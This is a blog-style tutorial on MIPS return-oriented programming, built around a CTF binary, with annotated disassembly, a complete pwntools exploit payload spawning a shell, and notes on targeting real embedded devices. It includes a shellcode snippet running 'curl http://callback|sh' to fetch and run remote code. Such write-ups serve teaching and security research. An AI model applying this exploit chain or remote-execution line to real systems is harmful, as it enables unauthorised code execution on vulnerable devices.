MIPS ROP

good gods amd64 ROP is legitimately trivial compared to any architecture that returns from a register instead of the stack by default. also hatsune miku wrote ghidra

i have spent the last ~1.5 weeks in this land so obviously i am now the world's leading expert in mips exploitation. Dr. haskal, Ph.D

ok so let's get directly into this. check this out

[haskal@blahaj CTF]$ python3
Python 3.8.3 (default, May 17 2020, 18:15:42) 
[GCC 10.1.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.arch='amd64'
>>> ROP(ELF("/bin/bash")).gadgets.__len__()
[*] '/bin/bash'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Loading gadgets for '/bin/bash'
122

nice

>>> context.arch='mips'
>>> ROP(ELF("3kctf/babymips/challenge")).gadgets
[*] '/home/haskal/Documents/CTF/3kctf/babymips/challenge'
    Arch:     mips-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
[*] Loaded 1 cached gadgets for '3kctf/babymips/challenge'
{4197288: Gadget(0x400ba8, ['syscall'], [], 0x0)}
>>> 

oh,

a quick introduction to mips, in particular

  1. for some reason toolchains for embedded mips targets don't like to set NX1. might just be because they're old
  2. s0-s7 are callee-saved general purpose registers. these are important because since they're callee-saved, we're going to see a lot of compiler-generated code that saves them on the stack at the beginning of functions, and loads them out of the stack at the end of functions
  3. ra is a register for the current return address. jr ra is the instruction used to return. so the return address is not on the stack by default! however, in functions that call other functions ra will be saved to the stack and then loaded at the end of the function. the result of this is we can only do ROP on these functions
  4. gp is a "global pointer" - it's used to do library call lookups, which typically get resolved into the register t9 followed by a jalr t9 (jalr calls a function - it Jumps And Links the return address to ra and it's using a Register)
  5. v0 and v1 are used to return values from functions and a0 - a3 are used for the first 4 function arguments
  6. mips is outdated as hell so of course it has a delay slot: every branch and jump2 has an instruction following it which will get executed before the branch if it's taken, and also gets executed if the branch is not taken. this can be abused sometimes! ROP gadgets that jump to a delay slot skipping the call it was supposed to go with can do useful things 🦈✨

so the deal with mips rop is it's a bit complicated, and it can involve both returns (jr ra) and calls (eg jalr t9). there was a set of ida pro scripts for finding mips rop gadgets, which got ported to ghidra here https://github.com/tacnetsol/ghidra_scripts. now it turns out for both CTF problems and for other stuff these weren't super useful. they suffer from really poor peformance, and don't actually find gadgets that you can find manually. fundamentally i think rop finders that are based on just pattern-matching will always suffer from having false negatives. perhaps a more general and architecture-agnostic ROP tool (and perhaps a more robust one_gadget) could combine basic pattern matching to initially narrow down the search with some symbolic execution to figure out exactly what can be controlled and what constraints need to be met. for example, i believe no naive pattern-matching ROP tools would be capable of finding gadgets that involve controllable branches before the controllable return jump

mips rop - using someone else's ghidra scripts to find rop gadgets, and the script says 0 gadgets found

(clearly here this is extremely false negative, because there are gadgets in this binary that fit the constraints this script is looking for)

for a relevant example, this is a mips CTF problem i did a writeup for: https://git.lain.faith/BLAHAJ/writeups/src/branch/writeups/2020/3kctf/babym1ps#user-content-babym1ps
(CTFs aren't always applicable to Real Life Exploitation but it turns out there's mips stuff in the wild without NX set and without PIE and it's basically the exact scenario in this CTF problem). anyway i'm going to use this one because as usual i'm not posting real stuff on here :P - this will rehash the contents of the writeup but hopefully go more in depth and be more generalizable

some types of gadgets

let's get acquainted with stuff that can be rop'd. and here i'm going to avoid screenshotting and just dump the raw asm with ghidra annotations. some day i'll have fancey blog software that is capable of highlighting this and stuff

                             LAB_00446d50                                    XREF[1]:     00446d70(j)  
        00446d50 2c 00 bf 8f     lw         ra,local_4(sp)
                             LAB_00446d54                                    XREF[1]:     00446d10(j)  
        00446d54 28 00 b4 8f     lw         s4,local_8(sp)
        00446d58 24 00 b3 8f     lw         s3,local_c(sp)
        00446d5c 20 00 b2 8f     lw         s2,local_10(sp)
        00446d60 1c 00 b1 8f     lw         s1,local_14(sp)
        00446d64 18 00 b0 8f     lw         s0,local_18(sp)
        00446d68 08 00 e0 03     jr         ra
        00446d6c 30 00 bd 27     _addiu     sp,sp,0x30
                             LAB_00446d70                                    XREF[1]:     00446ce4(j)  
        00446d70 f7 ff 00 10     b          LAB_00446d50
        00446d74 25 10 00 00     _or        v0,zero,zero
                             CFUN_00446d78
        00446d78 00 00 00 00     nop
        00446d7c 00 00 00 00     nop

this is a bog-standard mips epilogue. this one loads ra from the stack and the loads s4 - s0 and then returns to ra - note the delay slot, where before returning it also adds to the stack pointer, which closes this function's stack frame. these types of standard epilogues are useful for gaining control of all the s* registers you might need to use later, in case the function that triggers your exploit doesn't give you control over the ones you want. just find another one of these epilogues that does contain a lw for the register and then from that epilogue's ra you can go on your way. sometimes these epilogues will also load gp, which is useful to look for when you want to control gp.

        004474dc 10 00 bc 8f     lw         gp,local_20(sp)
        004474e0 0d 00 44 24     addiu      a0,v0,0xd
        004474e4 64 80 99 8f     lw         t9,-0x7f9c(gp)=>->FUN_00417e40                   = 00417e40
        004474e8 09 f8 20 03     jalr       t9=>FUN_00417e40                                 undefined FUN_00417e40()
        004474ec 01 00 53 24     _addiu     s3,v0,0x1

this is a gp-based call, here it loads a previously saved gp from the stack and then calculates a function offset based on it using t9, then calls. note that this looks up a function pointer that's stored in the data section. so you can't use this gadget to call anything you want, only functions that have pointers defined to them (library calls, which is what this mechanism is for will have pointers in the GOT3). so the end result is you are usually able to call any libc or other library function using a gadget like this but importantly, only when it's resolved. for static binaries like this CTF problem, that's every function because it's static. but this specifically won't work, for example, on the uClibc thunk resolver3 because that expects gp to be a "correct" value and will go into the weird undefined behavior zone (the kind you don't want, as opposed to the rop chain you're building which is the kind you do want). i haven't actually tested this with GNU libc but i suspect the story is the same. so basically in dynamically linked binaries you can only call stuff that has already been called by the binary. also usually you want to regain control again after this call, so you'll want to find an instance of this gadget that's in a tail call position4, and therefore by controlling gp and the stack below including a saved ra you can call a libc function, complete that, and then continue to the next rop gadget.

        004452a8 38 00 a5 27     addiu      a1,sp,0x38
        004452ac 00 00 44 8e     lw         a0,0x0(s2)
        004452b0 25 30 00 02     or         a2,s0,zero
        004452b4 1c 00 b3 af     sw         s3,local_5c(sp)
        004452b8 25 c8 80 02     or         t9,s4,zero
        004452bc 01 00 e7 24     addiu      a3,a3,0x1
        004452c0 18 00 a0 af     sw         zero,local_60(sp)
        004452c4 14 00 a2 af     sw         v0,local_64(sp)
        004452c8 09 f8 20 03     jalr       t9
        004452cc 10 00 a0 af     _sw        zero,local_68(sp)

this is a gadget where the tail jump actually ends up being controlled by a register (s4, which gets moved to t9 - note instead of move there is bitwise or with zero, which accomplishes the same thing), so rather than controlling the saved ra on the stack we'd want to control a saved s4. (this when the first type of gadget might come in handy). this also ends up being a thing that tells us where the stack is, due to moving sp (with an offset) to a1. but it comes with conditions! s2 must be a writable location otherwise the second instruction will segfault. you can throw in any address that's writable for that, for example a data section address if you know where data is (if there's no PIE).

so how do you actually search for gadgets assuming your tools have failed you? a strategy is to start with the goal and work backwards. the goal here is to jump to the stack to execute shellcode. to do that, we need to first know where the stack is, and then call that location. there are some gadgets that are going to let you call addresses in registers, like the previous gadget which called the address in s4. but you can also abuse functions in the binary that take parameters of other functions. this is particularly useful with a dynamically linked binary, which is going to be smaller and might not actually have any gadgets that directly call registers that you can load sp into

"novel" technique of the day: ret2entry

so for that i came up with a technique which under the standard naming convention would be called ret2entry. usually when you compile a binary, main is not the real entry point. the compiler inserts an entry point that is going to set up some basic things and then call a libc init function with the address of main. in particular, a0 will be the address of main and the rest of the parameters get set up in order, so if you simply jump to the right place in entry with a0 set to your shellcode address it'll do the whole thing for you as if you just started the program and the shellcode is main.

this is what this looks like (it turns out in the wild, eg with dynamic uClibc it's exactly the same except that you also need to control gp before you return to entry because the uClibc init expects it to be un-clobbered)

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined entry()
                               assume gp = 0x4993a0
             undefined         v0:1           <RETURN>
             undefined4        Stack[0x0]:4   local_res0                              XREF[1]:     0040036c(R)  
             undefined4        Stack[-0x8]:4  local_8                                 XREF[1]:     00400390(W)  
             undefined4        Stack[-0xc]:4  local_c                                 XREF[1]:     0040038c(W)  
             undefined4        Stack[-0x10]:4 local_10                                XREF[1]:     00400388(W)  
                             entry                                           XREF[2]:     Entry Point(*), 00400018(*)  
        00400350 25 00 e0 03     or         zero,ra,zero
             assume gp = <UNKNOWN>
        00400354 01 00 11 04     bal        LAB_0040035c
        00400358 00 00 00 00     _nop
                             LAB_0040035c                                    XREF[1]:     00400354(j)  
        0040035c 4a 00 1c 3c     lui        gp,0x4a
        00400360 a0 93 9c 27     addiu      gp=>_mips_gp0_value,gp,-0x6c60
        00400364 25 f8 00 00     or         ra,zero,zero
        00400368 18 80 84 8f     lw         a0=>main,-0x7fe8(gp)=>->main                     = 004005e0
        0040036c 00 00 a5 8f     lw         a1,0x0(sp)=>local_res0
        00400370 04 00 a6 27     addiu      a2,sp,0x4
        00400374 f8 ff 01 24     li         at,-0x8
        00400378 24 e8 a1 03     and        sp,sp,at
        0040037c e0 ff bd 27     addiu      sp,sp,-0x20
        00400380 1c 80 87 8f     lw         a3=>FUN_00401020,-0x7fe4(gp)=>->FUN_00401020     = 00401020
        00400384 20 80 88 8f     lw         t0,-0x7fe0(gp)=>->FUN_00401108                   = 00401108
        00400388 10 00 a8 af     sw         t0=>FUN_00401108,local_10(sp)
        0040038c 14 00 a2 af     sw         v0,local_c(sp)
        00400390 18 00 bd af     sw         sp,local_8(sp)
        00400394 24 80 99 8f     lw         t9,-0x7fdc(gp)=>->FUN_00400870                   = 00400870
        00400398 09 f8 20 03     jalr       t9=>FUN_00400870                                 undefined FUN_00400870(undefined
        0040039c 00 00 00 00     _nop
                             LAB_004003a0                                    XREF[1]:     004003a0(j)  
        004003a0 ff ff 00 10     b          LAB_004003a0
        004003a4 00 00 00 00     _nop
                             CFUN_004003a8
        004003a8 00 00 00 00     nop
        004003ac 00 00 00 00     nop

with static glibc here it's easier because the libc init function doesn't care about gp going in. so if a0 contains the address of the shellcode to call (on the stack) you return here to 0x0040036c and let the libc handle the rest!

now it turns out for this challenge there are other gadgets you can use, you don't need to return to entry. but in a smaller dynamic binary without those gadgets it can be really useful

continuing rop

so that's settled, now you need to get sp into a0 somehow. for this i just used ghidra search for addiu sp, a* in the assembly listing. usually you aren't going to find straight move sp, a0 for example but you will find addiu because there are going to be a lot of calls to stuff like memcpy for example in the original source where a stack offset will be passed as the first or second parameter. so this works for this gadget. in this case there was no gadget for a0 but there was a gadget for a1. that's still useful, because we can still chain it with a gadget that can move a1 into a0, and it turns out there is such a gadget but it's not something your automated tools would ever tell you about

                             **************************************************************
                             *                          FUNCTION                          *
                             **************************************************************
                             undefined CFUN_00460e94()
                               assume gp = 0x4993a0
             undefined         v0:1           <RETURN>
                             CFUN_00460e94                                   XREF[4]:     FUN_00463fc0:00464064(c), 
                                                                                          FUN_004641f8:004642c8(c), 
                                                                                          0047c4e4(*), 00491680(*)  
        00460e94 08 00 e0 03     jr         ra
             assume gp = <UNKNOWN>
        00460e98 08 03 82 8c     _lw        v0,0x308(a0)

.....

        00464058 25 20 a0 00     _or        a0,a1,zero
                             -- Flow Override: CALL_RETURN (CALL_TERMINATOR)
                             LAB_0046405c                                    XREF[1]:     00464000(j)  
        0046405c 1c 00 bf 8f     lw         ra,local_4(sp)
        00464060 20 00 bd 27     addiu      sp,sp,0x20
        00464064 8b f3 00 10     b          CFUN_00460e94                                    undefined CFUN_00460e94()
        00464068 25 20 a0 00     _or        a0,a1,zero
                             -- Flow Override: CALL_RETURN (CALL_TERMINATOR)

i found this one with more ghidra search for the exact instruction in question here, or a0,a1,zero. now this one is spooky because it does the action you want and then branches to a location that returns to ra. so it's interesting. but it does work, because ultimately again you have control of the return address using the stack location that ra gets loaded from.

so basically, you start with the constraint "call the stack", find stuff that satisfies that, then find stuff that satisfies additional constraints for the step you added, and so on, like a depth first search of constraint solution space for this binary. except you'll want to stop if the current branch is getting too long and try another branch. eventually you end up with a series of rop steps that don't have any unsatisfied constraints. and that was basically it for this challenge, you get the sp -> a1 gadget, then the a1 -> a0 gadget, then the ret2entry and you have code execution :P

let's move on to challenges for a real target. because this works in qemu-mipsel but we might run into some weird problems if you ran this sort of exploit on a real mips device?
why?
because hardware sucks and computers are awful.
mips has two different cpu caches5, an instruction cache and a data cache. they're not coherent between each other. this means if you write shellcode it might end up in the data cache, and it might not be flushed to main memory in time so when you jump to that shellcode it'll end up jumping to stale data that isn't valid instructions and you'll get a SIGILL or something. so you need to make sure the data cache is flushed before you jump. this is annoying because the standard cacheflush libc call takes a bunch of parameters and needs to know stuff and it's going to basically be impossible to call that. instead you can call sleep with a small timeout, which works as i found out not because kernel context switches flush the cache (they don't), but because if you sleep for some time other stuff that's executing during the sleep will probably spam the cache enough that your shellcode entry is going to get flushed at some point. so for this, you basically need to call into libc sleep while a0 is set to a small integer as part of your rop chain. this can actually be challenging, because for example sleep might not be in the GOT at all, in which case you are kinda hosed because you have no idea where libc is (so you'll need a leak), or in the case of dynamic uClibc stuff, it might not be linked in yet which means if you try to call the linker thunk with a bad gp it'll fail. this is one of those rare cases where you actually want the binary to be RELRO!
anyway, at the moment i am not actually sure what the full list of libc calls is that might be available, and easy to call, and actually will trigger cache flushes. i suspect for example that calling fork will do the trick because the kernel must flush the pages when it marks them COW, or when it actually faults on COW pages but i'm not actually sure. for continued mips exploitdev it might be useful to actually compile a list of stuff besides sleep that could work.

assembling the chain

once you have your series of rop steps, you need to actually put together the exploit. for this, go through each step of the rop chain and see how much it shifts the stack, and where the locations in that gadget's stack frame are. sometimes gadgets don't shift the stack, so then the frame for that gadget is the same as the next one. to get situated i usually spray a sequence of incrementing words, 0, 1, 2, 3 ... and then breakpoint the target in gdb to see which value ra took or if it's offset by part of a word. you can also be Proβ„’ and use pwntools de brujin sequences for this. then, align the first stack frame including the general registers that get loaded from the stack and ra. most of the time ra is going to go last. do the same thing for every distinct frame in your rop chain. for the CTF example, this is what that looked like

payload = (
    # frame of vulnerable function
    unimportant_stuff
    + cookie # stack cookie based on an earlier leak (chonp,)
    + b"CCCC" # s8 - don't care
    + p32(0x446d50) # ra - address of gadget 1
    # gadget frame for gadget 1
    + b"D"*24 # pad
    + p32(1337) # s0 - don't care
    + p32(1338) # s1 - don't care
    + p32(0x48f990) # s2 - some readable address needed
    + p32(0x40036c) # s3 - address of final ret2entry gadget (overwrite by gadget 2)
    + p32(0x464058) # s4 - gadget 3 address
    + p32(0x4452a8) # ra - gadget 2 address
    # gadget frame for gadget 2 and 3
    + b"E" * 28 # pad
    + p32(0x13371337) # ra (overwritten by s3)
    # gadget frame for entry
    + b"\x00" * 24 # final pad before shellcode
)

# pwntools is fun i literally don't even have to write this part myself
sc = asm(shellcraft.mips.sh())
payload += sc

here we have 3 gadget frames, which i have noted with comments. each frame ends in some saved registers and then the saved ra register. it gets complicated because one of the gadgets overwrites the stack location for the next gadget, so we actually have the final gadget address in a previous saved register slot. in general, there are probably going to be some additional constraints to satisfy, such as this sort of overwrite or providing a valid address in some register for some offhand read or write that happens in a gadget. finally, i added a small nop sled followed by the shellcode (in mips, the nop is conveniently the null word or more literally something like or zero,zero,zero). depending on the quality of the "get stack pointer" gadget, you may also have a situation where stack gets clobbered over your shellcode - in this case, start the shellcode with a relative branch to further down, skipping over the clobbered space, and continue from there. here's a really obtuse way to achieve this, for example

branch = asm("b next\n" + ("nop\n" * 32) + "next:" + shellcraft.mips.sh())

there also might be gadgets you can add that move the stack back up a bit so your precious shellcode doesn't get clobbered

finally, here's approximately a thing i did for having a long amount of data in a situation where i really just wanted to call a process to execute More Code, by default shellcraft assumes you don't know where the code is but you do. for example, if system is available, then to look it up in the GOT and call it (copy that part from asm in the binary that actually does the call)

code = asm("""
    addiu $a0, $sp, stack_offset+size_of_this_code
    lui $gp, 0x46
    addiu $gp, $gp, some_value
    lw $t9, some_offset($gp)
    jalr $t9
    nop""") + b"curl http://callback|sh\0"

shellcraft would blow up loading that string to approximately 2x as many bytes because of loading it halfword by halfword as immediates into registers.

fin 🦈

and yeah that's it. go forth and hack some stuff !
feel free to comment if you have any questions.

personal tangent

my university was going to teach me mips but they changed the curriculum to amd64 the literal semester i took the course and i'm still angery about it because i already knew amd64 i wanted to learn mips. so i had to learn mips by myself, of course


1

NX is the "No eXecute" bit, which specifies that the stack and heap should be non-executable. this prevents executing shellcode that's on the stack or the heap, and means you have to use ROP

2

ok haskal but what's the difference between a branch and a jump?
branch instructions are used for control flow within functions and work with hardcoded offsets and jump instructions are used to call or return between functions and can work with memory addresses or registers (side note: since instructions in mips are always the word size, you can't have a literal value with the full word size. so you typically have a flow of using lui [Load Upper Immediate] to set the top bits of a register, then addiu to add (or subtract) the lower bits. assemblers will usually fill this process in for you if you use a literal that is too large, which gets annoying when trying to align your ROP in pwntools so always make sure you check that your shellcode is the length you think it is)

3

GOT is the Global Offset Table, which contains pointers to library functions that got linked in for the current process. it starts out (on mips) pointing to thunks that look up the real library function using the system dynamic linker and save it to the GOT so the next call goes directly to the real function. in static binaries, it contains pre-filled pointers to the library functions in the binary

4

a tail call is a compiler optimization that saves stack space in cases where functions end with a call to another function, and return that function's return value without modification. so what the compiler does is instead of keeping the current function's stack frame around it completely replaces it with the target of the tail call's frame and then jumps to that target. if you think of the stack as a physical stack of blocks, normal calls add a new block on the stack, but tail calls replace the top block with a different block. for mips this means that the compiler might do something like 1) load ra from the stack 2) look up a library function using gp 3) jump to the function directly without linking, so now that function will return to the provided ra. this is very useful for calling libc stuff then continuing with the rop chain

5

CPUs don't always read and write directly in the system RAM all the time because that would be slow. RAM is really slow compared to the speed CPUs can execute instructions at. so instead of waiting for RAM fetches all day, CPUs usually implement a cache, which is small RAM located on the CPU core that can be used to buffer reads and writes to memory for areas of the memory that are used a lot. this means if some code on the CPU reads and writes to a part of RAM 100 times, instead of waiting for 100 operations directly to RAM it will fetch that part of RAM once, put it in the cache, operate out of cache, and then flush it back to RAM later. there's usually fancey stuff like multiple levels of cache, where each level gets larger and slower (that's the tradeoff in the design, the bigger it is the slower lookups are going to be)